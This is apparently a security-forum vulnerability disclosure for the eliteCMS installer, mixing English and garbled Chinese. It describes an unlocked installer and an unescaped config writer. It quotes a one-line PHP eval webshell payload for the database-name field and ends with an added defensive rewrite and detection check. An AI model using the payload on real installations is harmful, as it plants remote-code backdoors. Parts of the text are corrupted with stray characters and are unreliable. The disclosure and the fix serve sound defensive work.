eliteCMS: installer not locked after installation + one-liner backdoor write vulnerability

OP | Posted on 2012-11-18 13:59:27
After the eliteCMS installer finishes, it is not locked, so an attacker can re-run the installation by visiting the installer's URL.

Another vulnerability is that the installer can write a one-liner backdoor directly into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // session values are interpolated verbatim into the generated PHP source
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...

: x) r7 t% V' G" `6 _/ t* o* Q在看代码:  j( q4 y+ \4 ~) P$ W% o

7 R9 |0 j3 [2 P  j! k$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];' ]8 ], D% u/ d; _  K# h: D+ p# ~
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];& ^! J; e2 {( @
$_SESSION['DB_USER'] = $_POST['DB_USER'];, x( H% I$ X5 ?! H& O
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
% J" ^" Z" y2 `/ Q2 G, x4 @ & \$ u) l& K7 u9 \( O) A
取值未作任何验证
/ o9 M% b, y0 T1 \, \9 U如果将数据库名POST数据:
1 D1 e" r$ f$ Y% A7 J , t1 H+ \# U- M8 v
"?><?php eval($_POST[c]);?><?php9 i3 D" m9 x5 B& a+ D

& L" G6 _* I( f  Z将导致一句话后门写入/admin/includes/config.php$ s# L- N) [5 {4 I1 Y
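As an added example (not eliteCMS code and not part of the original post), the config writer rebuilt both ways, with a lexer-based check that shows why the raw interpolation is the defect, plus the lock-file check the installer lacks; the install.lock name and all function names are assumptions.

```php
<?php
// Added example, not eliteCMS code: the installer's config writer rebuilt two
// ways, plus a lock-file check. build_config_unsafe() interpolates raw values
// like the installer; build_config_safe() emits var_export() literals instead.

// Assumed lock file; the installer should create it once step 4 completes.
function installer_locked(string $dir): bool {
    return file_exists($dir . '/install.lock');
}

function build_config_unsafe(array $v): string {
    $w = "<?php\n";
    foreach ($v as $k => $val) {
        $w .= "define(\"$k\", \"$val\");\n";   // raw interpolation, as in the installer
    }
    return $w;
}

function build_config_safe(array $v): string {
    $w = "<?php\n";
    foreach ($v as $k => $val) {
        if (!preg_match('/^[A-Z_]+$/', $k)) {
            throw new InvalidArgumentException("bad config key: $k");
        }
        // var_export() yields a single-quoted literal with ' and \ escaped, so the
        // value can neither close the string nor leave PHP mode via ?>.
        $w .= 'define(' . var_export($k, true) . ', ' . var_export($val, true) . ");\n";
    }
    return $w;
}

// Defender check on the generated source: a correct config has no ?> close tag
// and no eval. token_get_all() only lexes, it executes nothing.
function count_close_tags_and_eval(string $src): array {
    $close = 0; $eval = 0;
    foreach (token_get_all($src) as $t) {
        if (!is_array($t)) continue;
        if ($t[0] === T_CLOSE_TAG) $close++;
        if ($t[0] === T_EVAL)      $eval++;
    }
    return [$close, $eval];
}

// Constructed sample input: the database-name value quoted in the post.
$input = ['DB_SERVER' => 'localhost', 'DB_NAME' => '"?><?php eval($_POST[c]);?><?php',
          'DB_USER' => 'elite', 'DB_PASS' => 's3cret'];
if (installer_locked(__DIR__)) exit("already installed\n");
var_dump(count_close_tags_and_eval(build_config_unsafe($input))); // [2, 1]: injected code
var_dump(count_close_tags_and_eval(build_config_safe($input)));   // [0, 0]: value stays data
```

The same token count can be run over an existing admin/includes/config.php to detect a file that has already been tampered with.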